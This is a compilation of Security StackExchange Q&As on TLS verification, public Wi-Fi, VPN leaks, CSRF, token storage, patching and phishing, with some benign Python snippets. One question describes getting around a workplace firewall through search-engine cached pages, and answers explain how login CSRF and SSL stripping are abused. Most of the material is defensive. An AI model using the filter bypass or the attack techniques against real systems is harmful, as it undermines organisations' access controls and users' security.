You can confirm that you're on the real Facebook by a variety of ways: Inspect the certificate used to secure the site. Open up your certificate (instructions vary by browser) and see what it says - is it issued to Facebook? Is it in a valid time period? Now, look at who signed that certificate, again, turn a critical eye towards it. Make sure everything makes sense. Go down the certificate chain until you get to the root certificate. Now, go to your favorite search engine and check that none of the certificate vendors have been in the news for a compromised private key. Unfortunately, the CA based ecosystem means you have to just trust the root CA, to some degree. Check the IP address you're connecting to - use your favorite NSLookup tool to see where your DNS is pointing you when you connect to facebook.com. Take that address to google, see if it matches what people commonly say Facebook's public IP address is. See if other people have recently reported issues connecting to Facebook over TLS, or have any concerns. Consider if those concerns seem valid to you, or if they seem like the user is just doing something incorrectly. Next, take all the data you've gathered from the above points, and any other reconnaissance you've done. Think critically about whether you think it's reasonable that all of the above has been faked by a convincing virus, evil malicious actor on your network, or Mark Zuckerberg having a laugh. Also consider that the issue you want to avoid (submitting or viewing information from Fakebook rather than Facebook) and think if it's possible that the eventual consequences (data leak) could happen in another way, such as a screengrabber or keylogger virus running and just recording your input into the real Facebook. Then, consider if the risk outweights the value you'd gain from logging into Facebook. Then realize that Facebook gives you no value and decide it's not worth the risk.
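For the second point, any resolver tool works; here is the same check as a tiny Python sketch - compare the addresses your own machine resolves with what other vantage points report for the same name:

import socket

addresses = sorted({info[4][0] for info in socket.getaddrinfo("www.facebook.com", 443)})
for addr in addresses:
    print(addr)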
{ "source": [ "https://security.stackexchange.com/questions/174724", "https://security.stackexchange.com", "https://security.stackexchange.com/users/161049/" ] }
174,850
In my opinion, the arguments we have been using for years to say that public Wi-Fi access points are insecure are no longer valid, and neither are the recommended remedies (e.g. use a VPN). Nowadays, most sites use HTTPS and set HSTS headers, so the odds that someone can eavesdrop on someone else's connection are very low, to the point of requiring a zero-day vulnerability in TLS. So, what other threats may someone face nowadays on a public network?
Public WiFi is still insecure, and it will always be if not used together with something like a VPN. Many websites use HTTPS, but not nearly all. In fact, more than 30 percent don't . Only around 5 percent of websites use HSTS. And it's still trust on first use. If the max age is short, that first use can be quite often. Let's face it, even if you are a security pro, chances are that you would fall for SSL strip anyway. I know I would. Just because you use HTTPS doesn't mean you do it right. There's still a lot of mixed content out there. Many clients still support old versions with known vulnerabilities, so an attack doesn't have to be a zero day to be successful. Even if you use HTTPS, you leak a lot of information anyway, such as the domain you visit, all your DNS traffic, etc. A computer or phone uses the internet for more than just browsing: All it takes is one app that has bad (or no) crypto for its update function and you are owned. All those apps you gave permission to access all sorts of personal data... They are phoning home constantly and you probably have no idea what data they are sending and what, if any, crypto they use. Dancrumb has more examples in his great answer . Defense in depth . Obviously a VPN isn't a silver bullet that solves all your security issues. But a good VPN does solve the ones specifically related to surfing on public coffee shop WiFi.
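The HSTS point is easy to check for any given site: the policy is just a response header, and it only protects you after the first visit (or if the site is in the preload list). A quick Python sketch using only the standard library (the URL is an example):

from urllib.request import urlopen

with urlopen("https://www.example.com/") as resp:
    hsts = resp.headers.get("Strict-Transport-Security")
    print(hsts if hsts else "no HSTS header sent")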
{ "source": [ "https://security.stackexchange.com/questions/174850", "https://security.stackexchange.com", "https://security.stackexchange.com/users/15194/" ] }
174,867
I recently started using a VPN and I've felt more comfortable browsing the Internet. My VPN allows me to select another country through which my traffic is routed to make it appear I'm located in that particular country. "What's my IP" and similar services show my IP address located in that country as expected. Search engines, however, are apparently not fooled. As I go to Google, for example, the front page is in my native language and it says my true country of origin at the bottom of the page. I was aware that this happens, as a VPN is not truly a means to make myself anonymous, and companies like Google can track my true location (I assume they do this for example by looking at the country specific top-level domain of the sites I visit?). But what puzzles me though, is that other search engines, such as DuckDuckGo, which promise not to track their users in anyway, can also see my true country of origin. The front page of DDG also appears in my native language (not English). So how is it that DDG and other "non-tracking" services see my true location without "tracking" me? Even when my IP address is located somewhere else, what gives my location away in such an obvious way that DDG can still claim not to track me?
One possible explanation is that DuckDuckGo is using the headers that are sent in your request to determine their display. For example, it is very common to use the Accept-Language header to determine in which language a webpage should be displayed. This header is set by default in all modern browsers based on the language preference settings. My browser, as an example, sends Accept-Language: en-US for all requests, letting the target site know that they should attempt to send back US based English if possible. This does not require any sort of tracking to be used. If you visit https://duckduckgo.com/settings you can see what the language settings are. The default language is Browser preferred language
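To make the mechanism concrete, here is a deliberately small Python sketch of the kind of selection a server can do with nothing but that header - no cookies, no IP geolocation, no tracking. Real servers use a proper Accept-Language parser; the supported-language list here is made up:

def preferred_language(accept_language, supported=("en", "de", "fr")):
    ranges = []
    for part in accept_language.split(","):
        piece = part.strip().split(";q=")
        lang = piece[0].strip().lower()
        q = float(piece[1]) if len(piece) > 1 else 1.0
        ranges.append((q, lang))
    for _, lang in sorted(ranges, reverse=True):
        base = lang.split("-")[0]
        if base in supported:
            return base
    return supported[0]

print(preferred_language("de-DE,de;q=0.9,en;q=0.7"))   # -> 'de'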
{ "source": [ "https://security.stackexchange.com/questions/174867", "https://security.stackexchange.com", "https://security.stackexchange.com/users/165368/" ] }
175,269
I have 2FA setup on my bank account. When I login, I receive a six-digit code as an IM on my phone that I enter into the website. These codes always seem to have a pattern to them. Either something like 111xxx, 123321, xx1212, etc. I'm thinking that these codes are intentionally easy to remember at a single glance. Is there a common business practice/best practice that dictates these codes have a pattern to them to make them easier to remember?
I have noticed this too, and I think it is a result of the human brain's tendency to apply patterns to random noise . This seems to be more common when specifically trying to remember a string of numbers.
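You can convince yourself of this with a quick simulation: with a loose enough definition of "pattern" (a digit repeated three or more times, or a short ascending/descending run), a large share of uniformly random six-digit codes will look patterned. A rough Python sketch - the definition of "pattern" here is arbitrary, so the exact percentage means little:

import random

def looks_patterned(code):
    if any(code.count(d) >= 3 for d in set(code)):
        return True
    digits = [int(c) for c in code]
    for i in range(len(digits) - 2):
        step = (digits[i + 1] - digits[i], digits[i + 2] - digits[i + 1])
        if step in ((1, 1), (-1, -1)):
            return True
    return False

random.seed(0)
codes = ["%06d" % random.randrange(1000000) for _ in range(100000)]
hits = sum(looks_patterned(c) for c in codes)
print("%.0f%% of random 6-digit codes look 'patterned'" % (100.0 * hits / len(codes)))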
{ "source": [ "https://security.stackexchange.com/questions/175269", "https://security.stackexchange.com", "https://security.stackexchange.com/users/1121/" ] }
175,310
If two people want to check they have the same (say 256 bit) private key, how great is the risk in sharing the first say 8 chars over a potentially public channel? Can an attacker recover any more information than just those characters, and/or how much faster could an attacker crack the key given those 8 chars?
Providing any part of the private key makes it less secure, at least marginally, simply because it provides an attacker with a smaller potential key space to explore. I fail to understand what you want to achieve. The only thing two people need to do to check if they hold the same information is exchange a hash. If you are designing a protocol and are worried about replay attacks, you can protect against them by performing a challenge-response using an HMAC. Edit : As suggested in the comments and explained in D.W.'s insightful answer , I need to emphasise that the impact on the security of your private key will depend a LOT on exactly what algorithm you are using. In the worst-case scenario, revealing only a small part of the private key will completely break the security of that key.
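A sketch of the hash/HMAC idea in Python: both parties compute a verifier over a fresh, publicly agreed nonce and compare only the verifiers, so nothing about the key itself crosses the channel. The demo generates one local key for both sides purely so the snippet runs:

import hashlib
import hmac
import secrets

def key_fingerprint(key, nonce):
    # Safe to exchange in the clear; with a high-entropy key it reveals
    # nothing an attacker can use to narrow down the key space.
    return hmac.new(key, b"key-check:" + nonce, hashlib.sha256).hexdigest()

shared_key = secrets.token_bytes(32)          # stand-in for the 256-bit private key
nonce = secrets.token_bytes(16)               # agreed publicly, fresh for every check

alice_says = key_fingerprint(shared_key, nonce)
bob_says = key_fingerprint(shared_key, nonce)
print("same key" if hmac.compare_digest(alice_says, bob_says) else "different keys")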
{ "source": [ "https://security.stackexchange.com/questions/175310", "https://security.stackexchange.com", "https://security.stackexchange.com/users/17549/" ] }
175,411
We recently got a vulnerability report saying that one of our HTML forms in one of the internal applications is not CSRF protected. At first, we could not reproduce it manually: using the developer tools and looking at the headers and cookies, we found the XSRF-TOKEN present in the headers. But then we reproduced the problem in an incognito tab or a "clean" browser. The problem was in the very first login attempt only. It appears that at the moment the first login request is posted, the client does not yet have the XSRF token, since this is the very first interaction between the client and the server. Is it still a vulnerability that should be addressed if it can only be reproduced on the very first login request? How is this kind of problem generally addressed? There probably needs to be some sort of client-server interaction before the login form submission so that the client would get the XSRF token beforehand.
This is called "Login CSRF" and is indeed a real problem that you should address. While an attacker couldn't fool a victim to log in to their own account since the attacker doesn't know the user's credentials, an attacker could fool the victim into logging in to the attacker's account. This can be used to trick a victim into giving up information to the attacker as the victim believes that they are signed in as themselves. This is indeed something that has been used to malicious ends. From Detectify : PayPal was once vulnerable to login CSRF and the attacker could make a user log in to the attacker’s PayPal account. When the user later on paid for something online, they unknowingly added their credit card to the attacker's account. Another, less obvious, example is a login CSRF that once existed in Google, which made it possible for the attacker to make the user log in to the attacker’s account and later retrieve all the searches the user had made while logged in. Even if you can't think of any way this could be leveraged on your site, a clever attacker might. There is no reason to allow it. So how do you block it? Even if the first action the user take is to log in, the first interaction they have with the server is to fetch the login page. Thats an opportunity to assign a CSRF-token. Then check for it on all requests that change the state of the server, including the login. (A tangentially related vulnerability is session fixation. Having CSRF-tokens that persist past login can expose you to that, so read up on that before you start implementing a solution.)
{ "source": [ "https://security.stackexchange.com/questions/175411", "https://security.stackexchange.com", "https://security.stackexchange.com/users/58553/" ] }
175,471
Scenario: I have a to-do list that is generated with JavaScript using JSON that was encoded on the server side. I put the to-do item id in the HTML id attribute. So the process goes like this: Server-side code creates a to-do array. Serialize the array to JSON. Loop through the array of JSON objects and render the to-do list. Now I have to edit a certain to-do item and update it. It is done like this: I filter my JSON object array by id, comparing against the to-do id that came from the HTML id attribute value, to get the object. I use AJAX to pass the object to the INSERT.PHP page. In the INSERT.PHP page I deserialize the JSON so I can update it in the database. Problem: Putting the to-do item id in the HTML id attribute will cause a flaw in the system because the user will have the capability to alter the to-do item id using the browser's developer console. Question: Is there a safe way to do it? Am I just doing it wrong or is this a normal thing to do?
Most of the details in your question are irrelevant. That the ID is stored in a HTML id attribute, the developer tools, that you are using jQuery... None of that really matters. The only thing that matters is that you have an endpoint on your server called insert.php . An attacker can send any request they want to that endpoint, regardless of what your client code looks like. Protections against people trying to do things that they are not allowed to do must be at the server, and not the client. So look at your PHP code. Does it verify that the input is in the expected format? Does it check that the user has the right to edit the particular todo list? If not, fix it. And remember, your validation and authorization checks must be performed on the server to have any security value. Specifically, if users should only be allowed to edit todos that they own you need to do the following in insert.php : Query the database to get the owner of the todo that is being modified. Get the id for the user making the request. Check that they are the same, and deny if they are not.
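The question's endpoint is PHP, but the shape of the check is the same in any language. A Python-flavoured sketch of those three steps; current_user_id(), error() and ok() are hypothetical helpers standing in for your session handling and response code:

def update_todo(request, db):
    # Nothing the client sends is trusted; all checks happen on the server.
    try:
        todo_id = int(request.form["id"])                 # reject non-numeric ids outright
    except (KeyError, ValueError):
        return error(400, "bad request")
    row = db.execute("SELECT owner_id FROM todos WHERE id = ?", (todo_id,)).fetchone()
    if row is None:
        return error(404, "no such todo")
    if row["owner_id"] != current_user_id(request):       # owner vs requester
        return error(403, "not your todo")
    db.execute("UPDATE todos SET title = ? WHERE id = ?", (request.form["title"], todo_id))
    db.commit()
    return ok()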
{ "source": [ "https://security.stackexchange.com/questions/175471", "https://security.stackexchange.com", "https://security.stackexchange.com/users/166142/" ] }
175,475
I'm using a physical Stormshield firewall to control the connections of a private company. There are rules to block some websites, like video game websites, Facebook, etc. However, these websites can still be accessed: you search for the website on Google, right-click it and open the cached version of it, which bypasses my restrictions. Any idea how to deal with this?
{ "source": [ "https://security.stackexchange.com/questions/175475", "https://security.stackexchange.com", "https://security.stackexchange.com/users/161726/" ] }
175,536
We were recently handed a security report containing the following: Cookie(s) without HttpOnly flag set vulnerability, which we apparently had in one of our internal applications. The applied fix was as simple as setting Django's CSRF_COOKIE_HTTPONLY configuration parameter to True . But, this is what got me confused. The Django documentation says: Designating the CSRF cookie as HttpOnly doesn’t offer any practical protection because CSRF is only to protect against cross-domain attacks. If an attacker can read the cookie via JavaScript, they’re already on the same domain as far as the browser knows, so they can do anything they like anyway. (XSS is a much bigger hole than CSRF.) Although the setting offers little practical benefit, it’s sometimes required by security auditors. Does this mean that there is no actual vulnerability here and we just have to be compliant with the security auditing rules?
As joe says , there is no real security benefit to this. It is pure security theater. I'd like to highlight this from the documentation : If you enable this and need to send the value of the CSRF token with an AJAX request, your JavaScript must pull the value from a hidden CSRF token form input on the page instead of from the cookie. The purpose of the HttpOnly flag is to make the value of the cookie unavailable from JavaScript, so that it cannot be stolen if there is an XSS vulnerability. But the CSRF token must somehow be available so it can be double-submitted - that's the whole point of it, after all. So Django solves this by including the value in a hidden form field. This negates the whole benefit of HttpOnly, since an attacker can just read the value of the form field instead of the cookie.
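For completeness, the settings involved look like this; the CSRF flag is the one the auditors asked for, while the session-cookie flags are where HttpOnly actually buys you something. Any template that uses {% csrf_token %} still renders the token into a hidden input that page scripts can read, which is exactly why the flag adds so little here:

# settings.py
CSRF_COOKIE_HTTPONLY = True     # satisfies the report; little practical benefit
CSRF_COOKIE_SECURE = True       # only send the CSRF cookie over HTTPS
SESSION_COOKIE_HTTPONLY = True  # the session cookie is where HttpOnly really matters
SESSION_COOKIE_SECURE = True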
{ "source": [ "https://security.stackexchange.com/questions/175536", "https://security.stackexchange.com", "https://security.stackexchange.com/users/58553/" ] }
175,707
In his paper Defective Sign & Encrypt in S/MIME, PKCS#7, MOSS, PEM, PGP, and XML , Don Davis often uses the term naïve sign & encrypt. After reading the paper, I'm not 100% sure what exactly is meant by this. Does he mean the possible habit of (mainstream) users thinking that sign & encrypt is an acceptable security practice, even though there is no assurance about who encrypted your message?
The author seems to use "simple" and "naïve" interchangeably. Yes it seems he is referring to the act of signing (with the senders private key) and encrypting (with the receivers public key) the plaintext before transmission. He views this as naïve because of the ability for a third party to forward a pre-existing signed message written by the sender to the receiver and the receiver assuming it safe to trust this. Imagine a situation where Bob and Alice are attempting to communicate securely. Chuck is an untrusted third party known to both of them. Chuck sends Bob a series of questions for which he expects Bob to reply with fairly generic responses. For example Chuck asks "Did you read Dons paper?" and Bob sends back "Yes" - signed and encrypted. Alice sends Bob a message saying "Can I trust Chuck". Chuck knows Alice is going to do this. Chuck decrypts the signed "Yes" message from before and re encrypts it with Alice's public key. He then sends it to her before Bob can reply. Alice receives a reply to her question saying "Yes". It is signed by Bob and was sent encrypted with her public key so she trusts it.
{ "source": [ "https://security.stackexchange.com/questions/175707", "https://security.stackexchange.com", "https://security.stackexchange.com/users/161637/" ] }
175,783
I am currently working on an Application which is a single page application built with Angular. It is served over HTTPS, using HSTS. For authentication, we are using Auth0. The Auth0 documentation recommends storing the access token in localstorage. An interceptor is then used to add this to the header of each HTTP request. However, this answer recommends not storing any sensitive information with localstorage. The answer is from 2011, and the author also co-wrote the OWASP HTML5 cheat sheet, which states: Pay extra attention to “localStorage.getItem” and “setItem” calls implemented in HTML5 page. It helps in detecting when developers build solutions that put sensitive information in local storage, which is a bad practice. I am wondering if the situation in 2017/2018 has changed. Am I OK to follow Auth0's guidelines, or should I take another approach?
Personally I see no issue with using local storage as long as you are happy with the user not having to re-authenticate between sessions. The linked answer provides the following argument against this, which I would argue is very weak: Underlying storage mechanism may vary from one user agent to the next. In other words, any authentication your application requires can be bypassed by a user with local privileges to the machine on which the data is stored. Therefore, it's recommended not to store any sensitive information in local storage. This applies to any kind of authentication token. Someone local with admin privileges (assuming it's not encrypted with a key tied to the user's credentials) can read it out of any kind of storage, RAM, or maybe even straight off the network. He also suggests "(or XSS flaw in the website)" - again, this applies to any kind of token that the JavaScript can access.
{ "source": [ "https://security.stackexchange.com/questions/175783", "https://security.stackexchange.com", "https://security.stackexchange.com/users/6838/" ] }
175,802
I have looked all over online as well as this site to try to find out more information regarding the security of this, but haven't found anything. In my particular case, the product is a website, but I think this question applies for any software that hosts a large number of users. I know there are numerous websites out there that allow you to change your username, but at the same time there are many that do not allow it. I'm sure some that do not allow it may be just for simplicity, but possibly for security as well. My question is just like the title asks: From a security standpoint, would you say it is good or bad practice to allow individuals to change their username? I currently cannot think of any reason not to allow it, given it is done properly (ie make it impossible for duplicate usernames, require inputting current password to make sure password requirements are still met regarding not containing username, etc), but I can't help but think there's something I'm missing. I know there are advantages from the user's perspective to allow them to change their username. An example would be if they set their username to their email address and decide to use a different email address later. Instead, I'm curious of the benefits vs risks regarding the security of the application and login process if you allow them to change their username. EDIT: Some of the answers bring up good points regarding publicly-displayed names, but to clarify, the question is not regarding any public display name, but instead the unique username used to log in.
Many people have looked at the reasons not to allow name changes from both a security and a community standpoint. However, there are plenty of legitimate reasons to allow username changes, even if the username is separate from the display name , for example: Someone has changed their real life name or the name by which they'd prefer to be called, due to marriage, family situations, escaping stalking/harassment/etc., and so on Even in the case of it being simply a username, having to use an old name which carries trauma can further the trauma. Also, it is quite possible for a stalker/harasser to know their target's login credentials, and being able to change both parts of the credential lowers the attack surface; further, monitoring attempts at logging in to an abandoned username allows for building a legal case against a bad agent. People have decided to move forward on a gender transition Being forced to use one's "dead name," even in the context of a private username, is also very traumatic. (I can speak to personal experience on this one.) People have a username that they no longer feel suits them for whatever reason This has less of an implication for internal usernames but it's still better to err on the side of kindness, in my opinion. These are all important for user comfort, and in many cases people would likely just create a new account with the new name anyway, so might as well support it. Avoiding social engineering certainly is important but there are approaches that help to mitigate this, such as various forms of verification (as seen on several social networks), public-key cryptography, and profile indicators ("name last changed N months ago; name changed K times"). And, since this question has been edited to be regarding internal user names and not public display names, those concerns aren't even germane to the discussion. Also, keep in mind that many attack surfaces provided by someone changing their username is also present for someone simply creating a new account, and if a username change option is not available then the user will likely create a new account - possibly using the same password as the old one and otherwise doing things that might lead to compromised security. It is a good idea to maintain an audit trail of username changes and disallow the creation of new accounts that use a previously-used username (at least if the username was last used within the past, say, year), but there is no reason that the username should ever be the primary key used to associate data with the user account in the first place, because there are legitimate purposes for a username change and all account records should be normalized to an abstract internal-only ID in the first place.
{ "source": [ "https://security.stackexchange.com/questions/175802", "https://security.stackexchange.com", "https://security.stackexchange.com/users/166511/" ] }
175,866
Listening to the Secure code lessons from Have I Been Pwned made me really think about logging. It appears that in the real world a lot of data breaches are discovered long after they happened which makes the investigation and recovery much more difficult because oftentimes there are no logs to follow and research. What can we do about it? Should we keep all the application/system/webserver logs forever?
There is no "correct" answer to your question, unfortunately. Data retention policies are specific to the needs of an organization, and are often implemented out of necessity to comply with various legal requirements , which vary depending on the nature of the data being stored, as well as the jurisdiction that the data falls under. Retaining log data can allow for post-mortem analysis if a breach is discovered, as you're alluding to in your question. However, retained data can also be a security risk in its own right if the logs contain sensitive information, so steps must be taken to secure log files if necessary. The other obvious factor in play is the cost of keeping the logs. Depending on availability requirements, different backup solutions may be more cost effective than others, such as keeping old logs offsite on tape storage rather than using disk redundancy.
{ "source": [ "https://security.stackexchange.com/questions/175866", "https://security.stackexchange.com", "https://security.stackexchange.com/users/58553/" ] }
175,977
An operating system has reached End of Support (EoS) so no more security patches are coming for the OS ever. An embedded device running this OS needs to be updated to a newer version. However, the engineers who designed the original product feel that the machine is not hackable and therefore does not need to be patched. The device has WiFi, Ethernet, USB ports and an OS that has reached EoS. The questions I am asked daily: We have application white-listing so why do we need to patch vulnerabilities? We have a firewall so why do we need to patch vulnerabilities? And the comments I get: Our plan is to harden the system even more. If we do this then we should not have to update the OS and continue patching it. No one will be able to reach the vulnerabilities. Also we will fix the vulnerabilities in outward-facing parts of the OS (even though there is no ability for them to patch the vulnerabilities themselves) and then we can leave the non-outside facing vulnerabilities unpatched. I have explained in detail about Nessus credentialed scans. I am not sure how to get my point across to these engineers. Any thoughts on how I can explain this? UPDATE: The system is being patched. Thanks for everyones responses and help.
The trouble with the situation (as you are reporting it) is that there are a lot of assumptions being made with a lot of opinions. You have your opinions and you want them to share your opinions, but they have their own opinions. If you want to get everyone to agree to something, you need to find common ground. You need to challenge and confirm each assumption and find hard data to support your opinion or theirs. Once you have common ground, then you can all move forward together. You have whitelisting: great, what does that mean? Are there ways around it? Can a whitelisted application be corrupted? What does the firewall do? How is it configured? Firewalls mean blocked ports, but they also mean allowed ports. Can those allowed ports be abused? No one has access? Who has access to the device? Are you trusting an insider or the ignorance of a user to keep it secure? What happens if someone gets local access to the device? How likely is that? As an information security professional, your job is not to beat people over the head with "best practices" but to perform risk analyses and design a way forward that limits risk under the risk threshold in a cost-effective way. You have to justify not employing best practices, but if the justification is valid, then it's valid.
{ "source": [ "https://security.stackexchange.com/questions/175977", "https://security.stackexchange.com", "https://security.stackexchange.com/users/166706/" ] }
175,983
I work as a data recovery consultant and a surprisingly large number of my clients are individuals who caught a virus from "The Internet" . A lot of people browse dodgy websites, download all kinds of files and click on those big flashy DOWNLOAD buttons without hesitation. I always try to give some advice on how to be more cautious in general, plus a more technical approach: use things like an ad blocker, a good antivirus and an up-to-date modern browser. Is there any more advanced approach for non-technical users to better protect against mass-targeted internet viruses?
{ "source": [ "https://security.stackexchange.com/questions/175983", "https://security.stackexchange.com", "https://security.stackexchange.com/users/166711/" ] }
176,197
i recently received the following (rather obvious) phishing email: i'm not a PayPal user so this particularly un-alarming for me. however, when viewing as plain text, it became evident that there were hidden characters between every displayed letter of each word, as so: ------------------------------ ------------------------------ ---------- Statement your account has been updated successfully on 12:30:14 pm Friday, December 22, 2017 HzeglelMo, YmocuTr aMcacdoduvnbt cfhoannlgze1s sHuzcocXeysVsmfEudlIlKy cwh9a2nOgVead. TFhFe dHePt2aNi2lGs oZf thhte cThzaAnAgJe3s abr9e iIn aztbteaVcshsegd DLorwCnIlFo6ald aYn0d rgeuaid tchGe altjtFaScMhJepd YZobu w3inlWl fOiAnFd m5edsDs0aHgJe iQn A2dToebee RgefaEdAenr (kPyDKFV) AfwoHr1mraMtn. TuhsaunxkWs fjorr jXori1neienRg t6hKe mkimlAlci4oKn6s off pkeiospslLe w8h8o rIeGlDy oSn uNs tho mpatkEe s4e2csu3rie fFiqnNaXnsccikaEl thrtaEnOsia2cFt6iWocn2s a7rUoPuTned tLh1e wIoxr5lnd0. SIiTnocAefrSeVlWyd,W PVacy6Pka1l1bidttS0u4pjp0oErCtE.k HbeUlrp r|xddl8vSme5cKu6rQi8tcyoslnnfCte8nrtDrDe PcavyqPzaDlkix8tt(yEGuIrRodp9eP) S.à ri.jlH.IeSt C3i2ee, Sb.rC8.EAp.M SyobcHiété eOn CqoGmImwaBnmdhiYtfe plaAr AacNtkiIonXs. RoeSgPirsNtpe6rreWd oefGfJi1cteD: 212w-t2P4 BloJuJl5ejvBaYrmd R6oGykahl, Ls-c2S4r4r9 Lzulx1etmbb7u9rkg1. RKCHS LmuFxweCmUbyuLrmg BE 161t8 3V419a. what could this be for? has anyone ever seen this? UPDATE - here are the From + Subject headings From: [email protected] . Sent: Sunday, December 24, 2017 9:39 PM Subject: Case ID Number PP-M-LL0PUG4V : Statement your account has been updated successfully on 12:30:14 pm Friday, December 22, 2017
This is just regular malware spam. The evil part of this message is likely the attached PDF it mentions. It likely contains an exploit which targets a vulnerability in one or more PDF readers and does something bad if opened with a vulnerable program. So do not open the attachment. The reason for the gibberish text in the email's source code is likely to confuse spam filters so they don't filter it.
{ "source": [ "https://security.stackexchange.com/questions/176197", "https://security.stackexchange.com", "https://security.stackexchange.com/users/166998/" ] }